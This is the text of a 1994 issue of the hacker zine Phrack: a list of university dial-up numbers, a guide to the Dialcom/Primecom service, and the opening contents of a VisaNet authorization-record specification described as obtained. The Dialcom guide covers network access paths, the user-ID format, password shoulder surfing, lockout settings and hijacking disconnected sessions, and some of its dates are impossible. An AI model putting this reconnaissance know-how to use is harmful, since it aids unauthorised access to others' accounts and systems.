3720 8072 836-7123 9997 412-938-4063 CUP.EDU 413-538-2345 MTHOLYOKE.EDU 413-545-0755 UMASS.EDU 3161 3050 3056 5345 3100 3780 413-585-3769 SMITH.EDU 413-597-3107 WILLIAMS.EDU 415-333-1077 CALSTATE.EDU 415-338-1200 SFSU.EDU 2400 415-380-0000 STANFORD.EDU 416-492-0239 TORONTO.EDU 501-575-3150 UARK.EDU 3506 7254 7266 8690 502-588-7027 LOUISVILLE.EDU 6020 8999 503-245-5511 PCC.EDU 503-346-5975 UOREGON.EDU 2150 3536 503-370-2500 WILLAMETTE.EDU 503-725-3100 PDX.EDU 3144 3201 5220 5401 503-737-1513 ORST.EDU 1517 1560 1569 503-777-7757 REED.EDU 504-286-7300 UNO.EDU 504-334-1024 LSU.EDU 505-277-9990 UNM.EDU 5950 6390 505-646-4942 NMSU.EDU 508-798-0166 WPI.EDU 509-375-9326 WSU.EDU 510-643-9600 BERKELEY.EDU 510-727-1841 CSUHAYWARD.EDU 512-245-2631 SWT.EDU 512-471-9420 UTEXAS.EDU 475-9996 513-327-6188 WITTENBERG.EDU 513-556-7000 UC.EDU 517-336-3200 MSU.EDU 351-9640 518-276-2856 RPI.EDU 8898 8400 2857 2858 8990 518-435-4110 ALBANY.EDU 4160 519-725-5100 WATERLOO.EDU 601-325-4060 MSSTATE.EDU 2830 8348 602-435-3444 MARICOPA.EDU 602-965-7860 ASU.EDU 603-643-6300 DARTMOUTH.EDU 604-753-3245 MALPITA.EDU 606-622-2340 EKU.EDU 606-257-1232 UKY.EDU 1353 1361 1474 2836 4244 5627 258-1996 2400 1200 323-1996 2400 2700 609-258-2630 PRINCETON.EDU 609-896-3959 RIDER.EDU 610-683-3692 KUTZTOWN.EDU 612-626-1920 UMN.EDU 2460 9600 614-292-3103 OHIO-STATE.EDU 3112 3124 3196 614-593-9124 OHIOU.EDU 615-322-3551 VANDERBILT.EDU 3556 343-0446 1524 615-372-3900 TNTECH.EDU 615-974-3201 UTK.EDU 4282 6711 6741 6811 8131 616-394-7120 HOPE.EDU 617-258-7111 MIT.EDU 257-6222 617-287-4000 UMB.EDU 265-8503 617-353-3500 BU.EDU 4596 9118 9415 9600 617-373-8660 NEU.EDU 617-437-8668 NORTHEASTERN.EDU 617-495-7111 HARVARD.EDU 617-727-5920 MASS.EDU 619-292-7514 UCSD.EDU 436-7148 452-4390 4398 8280 8238 9367 453-9366 480-0651 534-5890 6900 6908 558-7047 7080 9097 619-594-7700 SDSU.EDU 619-752-7964 CSUSM.EDU 702-895-3955 UNLV.EDU 703-831-5393 RUNET.EDU 703-993-3536 GMU.EDU 707-664-8093 CALSTATE.EDU 822-6205 707-826-4621 HUMBOLDT.EDU 708-467-1500 NWU.EDU 713-749-7700 UH.EDU 7741 7751 714-364-9496 CALSTATE.EDU 714-773-3111 FULLERTON.EDU 526-0334 714-856-8960 UCI.EDU 716-273-2400 ROCHESTER.EDU 716-645-6128 BUFFALO.EDU 719-594-9850 UCCS.EDU 535-0044 801-581-5650 UTAH.EDU 8105 585-4357 5550 803-656-1700 CLEMSON.EDU 804-594-7563 CNU.EDU 804-924-0577 VIRGINIA.EDU 982-5084 805-549-9721 CALSTATE.EDU 643-6386 805-664-0551 CSUBAK.EDU 805-756-7025 CALPOLY.EDU 805-893-8400 UCSB.EDU 806-742-1824 TTU.EDU 808-946-0722 HAWAII.EDU 956-2294 810-939-3370 UMICH.EDU 812-855-4211 INDIANA.EDU 4212 9656 9681 944-8725 9820 945-6114 814-269-7950 PITT.EDU 7970 362-7597 7558 827-4486 814-863-0459 PSU.EDU 4820 9600 865-2424 816-235-1491 UMKC.EDU 1492 1493 6020 818-701-0478 CSUN.EDU 901-678-2834 MEMST.EDU 904-392-5533 UFL.EDU 904-646-2772 UNF.EDU 2735 906-487-1530 MTU.EDU 907-474-0772 ALASKA.EDU 789-1314 908-571-3555 MONMOUTH.EDU 908-932-4333 RUTGERS.EDU 909-595-3779 CSUPOMONA.EDU 909-595-5993 CALPOLY.EDU 598-7104 909-621-8233 HMC.EDU 909-621-8455 POMONA.EDU 8332 909-621-8361 CLAREMONT.EDU 8313 8108 8509 909-880-8833 CSUSB.EDU 913-864-5310 UKANS.EDU 897-8650 916-456-1441 CSUS.EDU 737-0955 916-752-7900 UCDAVIS.EDU 7920 7950 916-894-3033 CSUCHICO.EDU 919-681-4900 DUKE.EDU 919-759-5814 WFU.EDU 919-962-9911 UNC.EDU ----------------------------------------------------------------------------- Canada 204-275-6100 umanitoba.ca 6132 6150 306-586-5550 University of Regina 306-933-9400 University of Saskatchewan 403-492-0024 University of Alberta 0096 3214 416-978-3959 University of Toronto 8171 418-545-6010 Universite du Quebec a Chicoutimi 418-656-7700 laval u 3131 5523 506-453-4551 University of New Brunswick 4560 4609 452-6393 514-285-6401 uquebec.ca 514-340-4449 polymtl.ca 4450 4951 343-2411 514-398-8111 McGill University 8211 8711 514-733-2394 Universite de Montreal 1271 0832 514-343-2411 7835 514-848-8800 concordia.ca 7494 8828 4585 8834 7370 519-661-3511 University of Western Ontario 3512 3513 519-252-1101 Windsor University 519-725-5100 University of Waterloo 1392 604-291-4700 simon fraser u 4721 5947 604-721-2839 univ of victoria 6148 604-822-9600 University of British Columbia 613-788-3900 Carleton University 564-5600 613-548-8258 Queen's University 545-0383 613-564-3225 University of Ottawa 5926 613-230-1439 York University 705-741-3350 Trent University 3351 4637 709-737-8302 Memorial Univ. of Newfoundland 807-346-7770 Lakehead University 819-569-9041 usherb.ca 821-8025 819-822-9723 bishop u 819-595-2028 Universite du Quebec a Hull 902-542-1585 acadiau.edu 902-425-0800 tuns.ca 420-7945 902-429-8270 Saint Mary's University 902-494-2500 Dalhousie University 8000 902-566-0354 University of Prince Edward Island 905-570-1889 McMaster University 1046 ----------------------------------------------------------------------------- The Rest of the World 31-40-435049 tue.nl 455215 430032 34-1-582-1941 Facultad de Odontologia 3-333-9954 Barcelona Polytechnic 8991 Univ of Barcelona 581-2091 691-5881 Polytechnic University 34-7-656-6553 Univ of Zaragosa 0108 6654 44-3-34-2755 st-andrews.ac.uk 44-71-413-0790 birkbeck college 44-524-843878 lancashire 44-785-214479 staffs.ac.uk 49-621-292-1020 uni-mannheim.de 121-0251 49-631-205-2150 uni-kl.de 3554 3629 3630 49-8421-5665 ku-eichstett.de 49-8452-70035 tu-muenchen.de 61-8-223-2657 Univ of Adelaide 61-9-351-9544 Curtin U 61-9-381-1630 uwa.edu.au 2200 3054 82-2-962 kaist.ac.kr 886-2-363-9529 NAT TECH U, TAIWAN ==Phrack Magazine== Volume Five, Issue Forty-Six, File 14 of 28 **************************************************************************** A L I T T L E A B O U T D I A L C O M *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* by Herd Beast (hbeast@phantom.com) Introduction ~~~~~~~~~~~ Dialcom is an interesting system for hackers for two reasons: First, it is used by business people, reporters and many other world wide, and it offers a variety of information services, from a bulletin board to stock market updates and news services. Second, Dialcom runs on Prime machines, so using Dialcom is a good way to learn Prime. True, it's not the best, as access is generally restricted, but it's better than, say, learning VMS from Information America. In these days, where everyone seems to be so centered about the Internet and the latest Unix holes, it's important to remember that the information super-highway is not quite here, and many interesting things are out there and not on the Internet. Phrack has always been a good place to find out more about these things and places, and I wrote this article after reading the Dialog articles in Phrack. Well, gentle reader, I guess that my meaning-of-life crap quota is full, so let's move on. Accessing Dialcom and Logging In ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Dialcom is accessible world-wide. It offers connection to Tymnet, Sprintnet, and other networks as well as dialin modems. Since I am not writing to Washington people only, I will specify only the easiest methods -- Tymnet and Sprintnet -- and some of the more interesting access methods. Dialcom is basically a Primecom network. Each user has an account on one or more of the systems connected to that network. To access Dialcom, the user needs to access the machine his account is on. First, he logs into a public data network and follows the steps required to connect to a remote note. On Tymnet, this means getting to the "please log in:" prompt, and on Sprintnet it's the famous '@' prompt. For Tymnet, you must enter at the prompt: DIALCOM; (eg, DIALCOM;57). The same goes for TYMUSA connection from outside the USA. For Sprintnet or other PADs, you must enter the correct NUA: System # Sprintnet NUA Tymnet NUA ======== ============= ============= XX 3110 301003XX 3106 004551XX (32, 34, 41 - 46, 50, 52, 57, 61, 63, 64) It should be noted that Dialcom keeps its own X.25 network, Dialnet, and the NUAs on it are those of the systems (connect to address "57" for system 57). Dialcom has other access methods, meant to be used from outside the USA, but sometimes available from within as well. One is a COMCO card, which is inserted into a reader connected to the computer and the modem through a serial link. The user then calls a special dial-up number, and can connect to Dialcom (or any other NUA). The card contains a number of "tax units" which are deducted as the connection goes through, until they are exhausted and the card is useless. The user calls the dial-up and types in ".". The amount of tax units on the card will then appear on the screen, and the user can connect to a host. COMCO dial-ups: Location Number ======================= ============== Australia +61-02-2019511 Belgium +32-02-2019710 France +33-1-20194075 West Germany +49-069-290255 Hong Kong +852-5-2019655 Netherlands +31-020-6624661 Switzerland +41-022-865507 United Kingdom +45-01-2019077 USA (Toll Free) +1-800-777-4445 USA +1-212-747-9051 The other way is through Infonet. I will not turn this into an Infonet guide, save to write the logon sequence needed to access Dialcom. At the '#' prompt, enter 'C'. At the "Center:" prompt, enter "DC". Dialcom NUAs are 31370093060XX, where XX is the system number. Once the connection to a Dialcom system has been established, you will be greeted by the Prime header: Primecom Network 19.4Q.111 System 666 Please Sign On > And the '>' prompt. This is a limited prompt as most commands cannot be issued at it, so you need to login. Dialcom user id's are typically 3 alphabetic characters followed by several digits. The password may contain any character except for ",;/*" or spaces, and my experience shows that they tend to be of intermediate complexity (most will not be found in a dictionary, but could be cracked). Password security may become useless at this point, because the Dialcom Prime systems allow ID to take both user id and password as arguments (which some other Primes do not) and in fact, Dialcom tutorials tell users to log on like this -- >ID HBT007 IMEL8 -- which makes ``shoulder surfing'' easier. One you log on, you will see: Dialcom Computer Services 19.4Q.111(666) On At 14:44 07/32/94 EDT Last On At 4:09 06/44/94 EDT > And again, the '>' prompt. >off Off At 14:45 07/32/94 EDT Time used: 00h 00m connect, 00m 01s CPU, 00m 00s I/O. Security at Dialcom ~~~~~~~~~~~~~~~~~~ As mentioned, while passwords are relatively secure, the manner in which they are entered is usually not. As for the accounts themselves, it's important to understand the general way accounts exist on Dialcom. Dialcom users are usually part of a business that has an ``account group'' on Dialcom. Each user gets an account from that group (HBT027, HBT054). Each group also has a group administrator, who controls what each account can access. The administrator determines which programs (provided by Dialcom) each user can access. A foreign correspondent for a magazine might have access to the news services while other users might not. The administrator also determines how much the user can interface with the Prime OS itself. Each user can run a few basic commands (list files, delete, sign off) but above that, it's up to the administrator. The administrator may opt to remove a user from the controlling menuing system -- in which case, the user has no restrictions forced upon him. Group administrators, however, handle only their groups, and not the Dialcom system. They need, for example, to notify Dialcom staff if they want an account removed from the system. Another (different yet combined) part of the account/group security are accounts' ``security levels'' (seclevs). Seclevs range from 3 to 7, and determine the access an account has to various places. Seclev 4 users, for example, are not restricted to seeing only users of their group on the system, and can delete accounts from the menuing system. User accounts own their directories and files within (but high seclevs can read other users' files). Each account's security is left in some extent to its owner, in that the user sets his own password. When setting a password, a user can set a secondary password. Any user wishing to access that user's directory will need that password. Furthermore, the user can allow other users to attach as owners to his directory if they know his password (come to think of it, couldn't they just login as him?). This is all controlled by the PASSWD program (see ``Common Commands'', below). Dialcom also allows for login attempt security using the NET_LOCK program. NET_LOCK blocks login attempts from addresses that have registered too many login failures over a period of time (the default being blocking for 10 minutes of addresses that have registered more than 10 failed login within 5 minutes). NET_LOCK -DISPLAY is accessible to users of Seclev 5 and shows addresses currently blocked and general information. Other options are accessible to Seclev 7 and are: -ON, -OFF, -ATTEMPTS (number of attempts so that NET_LOCK will block an address), -LOCK_PERIOD (the period in which these attempts must occur), -LOCK_TIME (time to block), -WINDOW (a time window in which the lockout feature is disabled). A little unrelated is the network reconnect feature of the Prime computers. When a user gets disconnected from the system because of a network failure, or for any other reason which is not the system's fault, he can log back in and reconnect into the disconnected job. When this happens, the user sees, upon logging on: You Have a Disconnected Job: HBT007 d09 1 109 NT NETLINK 989898989 6 3 Do You Want to Reconnect? Which means user's HBT007 job #9 (a NETLINK command) is waiting for a reconnection. At this point, the user can continue, leaving the job to hang until the system signs it off when a certain amount of time expires; sign the job off himself; or reconnect to that job. (Try "HELP" at the prompt.) This wouldn't be important, but experience shows that many disconnections occur when someone logs into Dialcom over a network, and then uses NETLINK (or another program) to connect to another site over a network, and somewhere, some time, he issues a control sequence (let's say to tell NETLINK to do something) that gets processed by the first network, which logs him off. So there is potential to log into the middle of people's sessions (yeah, like detached ttys). Common Commands ~~~~~~~~~~~~~~ Common commands are in reality the basic Prime commands that every account has access to. Here they are, in alphabetical order. `CLEAR' Clear the screen. `DATE' Shows the date at which a command was entered. Output: >DATE Proceed to next command >BAH Friday, June 38, 2025 10:01:00 AM EDT `DEL' Deletes a file. `DELP' Deletes several files based on wildcards. Can verify deletion of every file, and delete only file modified before, after, or between certain dates. `ED' Is the default and simplest file editor on Dialcom (some of its brothers are JED and FED). Once invoked, ED enters INPUT mode, in which the user just types text. To enter EDIT mode, where you can issue commands, you need to press on a blank line (the same thing will get you from EDIT mode back to INPUT mode). The EDIT mode uses a pointer to a line. All commands are carried on the line that the pointer points to. "T" will bring the pointer to the top of the text, "B" to the bottom, "N" to the next line down, "U" to the next line up, and "L " to the line containing . ED commands include: P: PRINT the pointer line. P will print of lines. C: Change words. The format is "C/old word/new word". A: Appends words. The format is "A ". R: Retype pointer line. The format is "R ". SP: Check the spelling of the text, and then point to the top of the text. SAVE: Will save the text and exit ED. Q: Will quit/abort editing and exit ED. `F' List all file info. Output: DIALCOM.TXT 001 13/30/94 13:50 ASC D W R Which means file name "DIALCOM.TXT", size of 1 file blocks, lat modified on 13/30/94 at 13:50, is an ASC type file, and the account has the permissions to D(elete), W(rite), and R(ead) it. `HELP' (`?') Displays a nicely formatted menu of available commands. `INFO' System info. INFO displays an information file, for example, INFO NETLINK. "INFO ?" lists info files. "INFO BRIEF" lists info files grouped by application "INFO INFO" lists info files with their descriptions. `L' List all file names. Output: HBT007 (Owner) DIALCOM.TXT `LS' Display information about available segments and the account's access to them. Output: 2 Private static segments. segment access -------------- 4000 RWX 4001 RWX 11 Private dynamic segments. segment access -------------- 4365 RX 4366 RX 4367 RWX 4370 RWX 4371 RX 4372 RWX 4373 RX 4374 RWX 4375 RX 4376 RX 4377 RWX `NAME' Changes UFD name. Output: >NAME Old Name: John Gacy UFD Name: Herd Beast All done >WHO Herd Beast HBT007 `NETWORK' Accesses a database that contains dial-up number for Sprintnet, Tymnet, Datapac and Dialcom's Dialnet by State/City. `OFF' Sign off the system. `ONLINE' Who's online? The amount of data displayed depends on the account's seclev. Seclevs below 4 are restricted to seeing only users of their group. Output: HBT007 PRK017 MJR `PAD' Allows you to send commands to an X.29 PAD, these commands being the SET/SET?/PAR? commands and their parameter/value pairs. `PASSWD' Change your password. PASSWD has two forms: a short one, which just changes the user's password, and a long form, invoked by PASSWD -LONG, which allows the user to set a second password for other users accessing his directory, and also to determine if they can have owner access to the directory. `PROTECT' Protects a file (removes permissions from it). "PROTECT DIALCOM.TXT" will remove all three (D, W, R) attributes from it. This will result in: >DEL DIALCOM.TXT Insufficient access rights. DIALCOM.TXT (DEL:10) But -- >DELETE DIALCOM.TXT "DIALCOM.TXT" protected, ok to force delete? y `SECLEV' Your security level. Output: Seclev=5 `SIZE' Size information about a file. Output: 1 Block, 404 Words `STORAGE' Shows storage information. `SY' Show users on system. (Same restrictions as for ONLINE apply.) Will show user name, time on, idle time, devices used, current jobs and state, etc. Output: 41 Users on sys 666 Names use idle mem State command object devs HBT007 *11 0 155 R1 SY 6 3 from Tymnet via X.25 `SYS' Displays account information and system number. Output: HBT007 on system 666. `TERM' Used to tell the Dialcom computer what terminal the user is using. A list of supported terminals is generated by "TERM TERMINALS". TERM options are: TYPE (TYPE VT100) WIDTH (Terminal width, if different than default) TOP (Start listings at top of screen) PAUSE (Pause listings when screen is full) -ERASE, -KILL (Sets the erase or kill character) -BREAK (Enables or disables BREAKs) -HALF or -FULL (Half duplex of full duplex) -DISPLAY (Output current terminal information) `WHO' Displays account information. Output: HBT007 Which means user HBT007 on system 666 on device 6. Communicating on Dialcom ~~~~~~~~~~~~~~~~~~~~~~~ Users who want to communicate on Dialcom have two choices, basically. These are the Dialcom bulletin board and electronic mail. The Dialcom bulletin board has two versions. The first consists of several message bases (called ``categories'') which are shared between some Dialcom systems (and mostly used by bored employees, it seems); there are also private bulletin boards, which are not shared between the systems. They belong to account groups, and only users in an account group can access that group's bulletin board system. These version of the Dialcom board are often empty (they have no categories defined and hence are unusable). This is accessed by the command POST (PRPOST for the private board). Once POST is activated, it will display a prompt: Send, Read or Purge: If the answer is READ, POST will ask for a category (a list of categories will be displayed if you type HELP at that prompt). Once a category has been joined, you will be able to read through the messages there: Subject: ? From: HBT007 Posted: Sat 32-July-94 16:47 Sys 666 quit /q /quit Continue to Next Item? Answering SEND at the first prompt will allow you to send a message in a category. Answering PURGE will allow you to delete messages post by your account. When you enter PURGE and the category to purge message from, the system will show you any posts that you are allowed to purge, followed by a "Disposition:" prompt. Enter DELETE to delete the message. The second way to communicate is the Dialcom MAIL system. MAIL allows sending and receiving messages, it allows for mailing lists, filing mail into categories, holding mail to read later and so on. MAIL is invoked by entering, uh... oh, yes, MAIL. It works along similar lines to those of POST, and will display the following prompt: Send, Read or Scan: SEND: Allows you to send a message. It will prompt with "To:", "Subject:" and "Text:" (where you enter the actual message, followed by ".SEND" on a blank line to end). After a message is sent, the "To:" prompt will appear again -- use "QUIT" to leave it. A word about the "To:" prompt. There are two configuration files which make its use easier. First the MAIL.REF file, which is really a mailing list file. It contains entries in the format of -- DOODZ DVR014 ABC0013 XYZ053 -- and at the "To:" prompt, you can just enter "DOODZ" and the message will be sent to all three accounts. When you enter a name, MAIL searches through your MAIL.REF, and then through the account administrator's, and only then parses it as an account name. Second is the mail directory, which contains the names and account IDs of many users the account is in contact with. To display it, type "DIS DIR" at the first prompt. You'll get something like this: HERD-BEAST 6666:HBT007 WE'RE BAD AND WE'RE KRAD Which means you can type "HERD-BEAST" at the prompt, and not just HBT007. Also, there are special options for the "To:" prompt, most notable are: CC to send a carbon copy; EX to send the message with ``express priority''; DAR to request that if the message is sent to a user on another Dialcom system, POSTMASTER will send you a message verifying that your message has been sent; and NOSHOW, to keep the receiver from seeing everybody else on the "To:" list. For example (all these people are in the mail directory), To: DUNKIN D.DREW CC FOLEY NOSHOW EX You enter the message about to be sent at the "Text:" prompt. That mode accepts several commands (like .SEND), all of which begin with a dot. Any command available at the "To:" prompt is available here. For example, you can add or remove names from to "To:" field using ".TO " or ".TO -", and add a CC using ".CC ". You also have a display command, ".DIS". ".DIS" alone shows the text entered so far; ".DIS TO" shows the "To:" field; ".DIS HE" shows the entire header; etc. Finally, you have editing option. ".ED" will load editing mode, so you can change the text you entered. ".LOAD " will load into the text of the message. ".SP" will check the spelling of text in the message, and there are other commands. READ: Allows you to read mail in your mailbox. Once you enter READ, MAIL will display the header of the first message in your mailbox (or "No mail at this time") followed by a "--More--" prompt. To read the message, press ; otherwise, enter NO. After you are done reading a message, you will be prompted with the "Disposition:" prompt, where you must determine what to do with the message. There you can enter several commands: AGAIN to read the message again; AG HE to read the header again; AP REPLY to reply to the message and append the original message to the reply; AP FO to forward the message to someone and add your comments to it; REPLY to reply to the sender of the message; REPLY ALL to reply to everybody on the "To:" field; FILE to file the message; SA to save the message into a text file; NEXT to read the next message in your mailbox; and D to delete the message. SCAN: Allows you see a summary of the messages in the mailbox. Both READ and SCAN have options that allow you to filter the messages you want to read: FR to get only messages from ; TO to get only messages sent to ; 'string' to get only messages containing ``string'' in the "Subject:" field; "string" to get only messages containing ``string'' in the message itself; FILE CATEGORY to get only messages filed into ``CATEGORY''; and DA Month/Day/Year to get only messages in that date (adding a '-' before or after the date will get you everything before or after that date, and it's also possible to specify two dates separated by a '-' to get everything between those dates. For example, to get all of Al Gore's messages about Clipper before August 13th: READ FILE CLIPPER FR GOR 'Great stuff' DA -8/13/94 There is also a QS (QuickScan) command that behaves the same as SCAN, only SCAN shows the entire header, and QS just shows the "From:" field. However, there is more to do here than just send, read or scan. Some of it was mentioned when explaining these commands. Both sent and received messages can be saved into a plain text file or into a special mailbox file, called MAIL.FILE. Messages filed into the MAIL.FILE can be grouped into categories in that file. SAVING MESSAGES: Messages are saved by entering "SA filename" at a prompt. For sent message, it's the "Text:" prompt, while entering the message, and the command is ".SA", not "SA". For received message, it's either the "--More--" or the "Disposition:" prompt. FILING MESSAGES: Messages are filed in two cases. First, the user can file any message into any directory, and second, the system files read messages that lay in the mailbox for over 30 days. Received messages are filed by entering "FILE" at the "Disposition:" prompt. This files the message into a miscellaneous category called BOX. If an optional is added after "FILE", the message will be filed into that category. If doesn't exist, MAIL can create it for you. After a message has been filed, it's not removed from the mailbox -- that's up to the user to do. Sent messages behaved the same way, but the command is ".FILE" from the "Text:" prompt. To display categories of filed mail, enter DIS FILES at a prompt. To read or scan messages in filed, just add "FILE after the command (READ, SCAN, etc). To delete a category, enter D FILE . To delete a single message in a category, just use D as you would on any other message, after you read it from the MAIL.FILE. Connecting via Dialcom ~~~~~~~~~~~~~~~~~~~~~ Dialcom allows its customers to access other systems through it. There are some services offered specifically through Dialcom, such as the BRS/MENUS service, which is an electronic library with databases about many subjects, Telebase's Cyclopean Gateway Service, which offers access to many online database services (like Newsnet, Dialog and even BRS) and more. These services have a direct connection to Dialcom and software that maps Dialcom user ids to their own ids (it's not usually possible for someone to access one of these services without first connecting to Dialcom). Another method is general connection to X.25 addresses. Since Dialcom is connected to X.25, and it allows users to use the Prime NETLINK commands, it's possible to PAD out of Dialcom!!#! NETLINK is invoked by entering NETLINK. NETLINK then displays its own, '@' prompt. The commands available there are QUIT, to quit back to the OS; CONTINUE, to return to an open connection; CALL, to call an address; and D, to disconnect an open connection. CALL takes addresses in several formats. A system name, to connect to a Dialcom system, or an address in the format of DNIC:NUA. For example, @ CALL :666 Circuit #1 666 Connected [...] @ CALL 3110:21300023 Circuit #2 21300023 Connected [...] NETLINK establishes connections in the form of circuits. A circuit can be broken out of into command mode (the '@' prompt), using "@", and another can be opened, or parameters can be changed, etc. NETLINK has other commands, to log connections into a file, or set PAD parameters (SET, PAR), or turn on connection debugging, or change the default '@' prompt, and more. Things to Do on Dialcom ~~~~~~~~~~~~~~~~~~~~~~ Much of what Dialcom offers was not covered until now and will not be covered. That's because most the services could use a file each, and because many account groups have things enabled or disabled just for them. Instead, I will write shortly about two of the more interesting things online, the news service and clipping service, and add pointers to some interesting commands to try out. The news service, accessed with the NEWS command, is a database of newswires from AP, Business Wire, UPI, Reuters and PR Newswire. The user enters the database, and can search for news by keywords. After entering NEWS, you will see a menu of all the news agencies. Once you choose an agency, you will enter its menu, which sometimes contains a copyright warning and terms of usage and also the list of news categories available from that agency (National, North America, Business, Sports, etc). Once you choose the category, you will be asked for the keyword to search for. If a story (or several stories) was found containing your desired keyword, you can read through the stories in the order of time, or the order they appear, or reverse order and so on, and finally mail a story to yourself, or enter new search keywords, or jump to another story, or simply quit. The news clipping service, available with the command NEWSTAB, allows the user to define keyword-based rules for selecting news clippings. The system then checks every newswire that passes through it, and if it matches the rules, mails the newswire to the user. After entering NEWSTAB, you are presented with a menu that allows you to show, add, delete, and alter your rules for choosing news. The rules are made using words or phrases, logical operators, wildcards and minimal punctuation. A rule can be as simple as "HACKING", which will get every newswire with the word "hacking" in it mailed to you, or if you want to be more selective, "NASA HACKING". Logical operators are either AND or OR. For example, "HACKING AND INTERNET". Wildcards are either '*' or '?' (both function as the same). They simple replace any number of letters. Punctuation is permitted for initials, abbreviations, apostrophes or hyphens, but not for question marks and similar. All of this is explained in the NEWSTAB service itself. For the file hungry, Dialcom offers several file transfer programs, including KERMIT and Dialcom's FT, which implements most popular protocols, like Zmodem, Xmodem, etc. A small number of other fun things to try: NET-TALK The ``interactive computer conferencing system'' -- build your private IRC! CRYPTO Dialcom's encryption program. Something they're probably going to love on sci.crypt. NUSAGE By far one of the better things to do on Dialcom, it was left out of this file because it is simply huge. This program allows the user (typically an administrator) to monitor network usage, sort the data, store it, peek into all the little details (virtual connection types, remote/local addresses, actions, time, commands, etc). Unfortunately, it's completely beyond the scope of this file, as there are tons of switches and options to use in order to put this program to effective use. ==Phrack Magazine== Volume Five, Issue Forty-Six, File 15 of 28 **************************************************************************** visanetoperations; part1 obtainedandcompiled by icejey /\ lowerfeldafederationforundercasing iiu delamolabz chuchofthenoncomformist && theilluminatibarbershopquartet greetz2; drdelam maldoror greenparadox kaleidox primalscream reddeath kerryk -------------------------- [ typed in true(c) 80 columns] --------------------- - ---------------------------- [ comments appear in []s ] ----------------------- - [ section one ] [ from the word of god ] ------------------------------------------------------------- | XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX | | XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX | | \\\\\ ///// ///// //////////// /////\\\\ | | \\\\\ ///// ///// ///// ///// \\\\\ | | \\\\\ ///// ///// /////////// \\\\\\\\\\\\\\ | | \\\\\/// ///// ///// \\\\\\\\\\\\\\\\ | | \\\\\/ ///// //////////// ///// \\\\\ | | XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX | | XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX | ------------------------------------------------------------- EXTERNAL INTERFACE SPECIFICATION -------------------------------- SECOND GENERATION AUTHORIZATION RECORD FORMATS For Record Formats -------------------------- J - PS/2000 REPS G - VisaNet Dial Debit 1.0 INTRODUCTION 2.0 APPLICABLE DOCUMENTS 2.01 RELATED VISA DOCUMENTS FOR AUTHORIZATION 2.02 RELATED VISA DOCUMENTS FOR DATA CAPTURE 3.0 AUTHORIZATION RECORD FORMATS 3.01 REQUEST RECORD FORMAT 3.02 RESPONSE RECORD FORMAT 4.0 REQUEST RECORD DATA ELEMENT DEFINITIONS 4.01 RECORD FORMAT 4.02 APPLICATION TYPE 4.03 MESSAGE DELIMITER 4.04 ACQUIRER BIN 4.05 MERCHANT NUMBER 4.06 STORE NUMBER 4.07 TERMINAL NUMBER 4.08 MERCHANT CATEGORY CODE 4.09 MERCHANT COUNTRY CODE 4.10 MERCHANT CITY CODE 4.11 TIME ZONE DIFFERENTIAL 4.12 AUTHORIZATION TRANSACTION CODE 4.13 TERMINAL IDENTIFICATION NUMBER 4.14 PAYMENT SERVICE INDICATOR 4.15 TRANSACTION SEQUENCE NUMBER 4.16 CARDHOLDER IDENTIFICATION DATA 4.17 ACCOUNT DATA SOURCE 4.18 CUSTOMER DATA FIELD 4.18.1 TRACK 1 READ DATA 4.18.2 TRACK 2 READ DATA 4.18.3 MANUALLY ENTERED ACCOUNT DATA (CREDIT CARD) 4.18.3.1 MANUALLY ENTERED ACCOUNT NUMBER 4.18.3.2 MANUALLY ENTERED EXPIRATION DATE 4.18.4 CHECK ACCEPTANCE IDENTIFICATION NUMBER 4.18.4.1 CHECK ACCEPTANCE ID 4.18.4.2 MANUALLY ENTERED CHECK ACCEPTANCE DATA 4.19 FIELD SEPARATOR 4.20 CARDHOLDER IDENTIFICATION DATA 4.20.1 STATIC KEY WITH TWENTY THREE BYTE CARDHOLDER ID 4.20.2 STATIC KEY WITH THIRTY TWO BYTE CARDHOLDER ID 4.20.3 DUK/PT KEY WITH THIRTY TWO BYTE CARDHOLDER ID 4.20.4 ADDRESS VERIFICATION SERVICE DESCRIPTION [hmmm...] 4.21 FIELD SEPARATOR 4.22 TRANSACTION AMOUNT 4.23 FIELD SEPARATOR 4.24 DEVICE CODE/INDUSTRY CODE 4.25 FIELD SEPARATOR 4.26 ISSUING INSTITUTION ID/RECEIVING INSTITUTION ID 4.27 FIELD SEPARATOR 4.28 SECONDARY AMOUNT (CASHBACK) 4.29 FIELD SEPARATOR 4.30 MERCHANT NAME 4.31 MERCHANT CITY 4.32 MERCHANT STATE 4.33 SHARING GROUP 4.34 FIELD SEPARATOR 4.35 MERCHANT ABA NUMBER 4.36 MERCHANT SETTLEMENT AGENT NUMBER 4.37 FIELD SEPARATOR 4.38 AGENT NUMBER 4.39 CHAIN NUMBER 4.40 BATCH NUMBER 4.41 REIMBURSEMENT ATTRIBUTE 4.42 FIELD SEPARATOR 4.43 APPROVAL CODE 4.44 SETTLEMENT DATE 4.45 LOCAL TRANSACTION DATE 4.46 LOCAL TRANSACTION TIME 4.47 SYSTEM TRACE AUDIT NUMBER 4.48 ORIGINAL AUTHORIZATION TRANSACTION CODE 4.49 NETWORK IDENTIFICATION CODE 4.50 FIELD SEPARATOR 5.0 RESPONSE RECORD DATA ELEMENT DEFINITIONS 5.01 PAYMENT SERVICE INDICATOR 5.02 STORE NUMBER 5.03 TERMINAL NUMBER 5.04 AUTHORIZATION SOURCE CODE 5.05 TRANSACTION SEQUENCE NUMBER 5.06 RESPONSE CODE 5.07 APPROVAL CODE 5.08 LOCAL TRANSACTION DATE 5.09 AUTHORIZATION RESPONSE CODE 5.10 AVS RESULT CODE 5.11 TRANSACTION IDENTIFIER 5.12 FIELD SEPARATOR 5.13 VALIDATION CODE 5.14 FIELD SEPARATOR 5.15 NETWORK IDENTIFICATION CODE 5.16 SETTLEMENT DATE 5.17 SYSTEM TRACE AUDIT NUMBER 5.18 RETRIEVAL REFERENCE NUMBER 5.19 LOCAL TRANSACTION TIME 6.0 CONFIRMATION RECORD DATA ELEMENT DEFINITIONS 6.01 NETWORK IDENTIFICATION CODE 6.02 SETTLEMENT DATE 6.03 SYSTEM TRACE AUDIT NUMBER 7.0 CHARACTER CODE DEFINITIONS 